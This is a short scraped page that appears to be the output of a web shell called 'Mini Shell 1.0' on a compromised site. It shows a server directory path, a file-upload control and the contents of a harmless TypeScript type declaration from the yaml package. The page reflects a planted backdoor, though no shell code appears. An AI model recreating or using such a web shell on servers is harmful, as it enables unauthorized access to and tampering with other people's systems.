HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/nodejs/yaml/dist/schema/core/
Upload File :
Current File : //proc/self/root/usr/share/nodejs/yaml/dist/schema/core/bool.d.ts
import type { ScalarTag } from '../types.js';
export declare const boolTag: ScalarTag & {
    test: RegExp;
};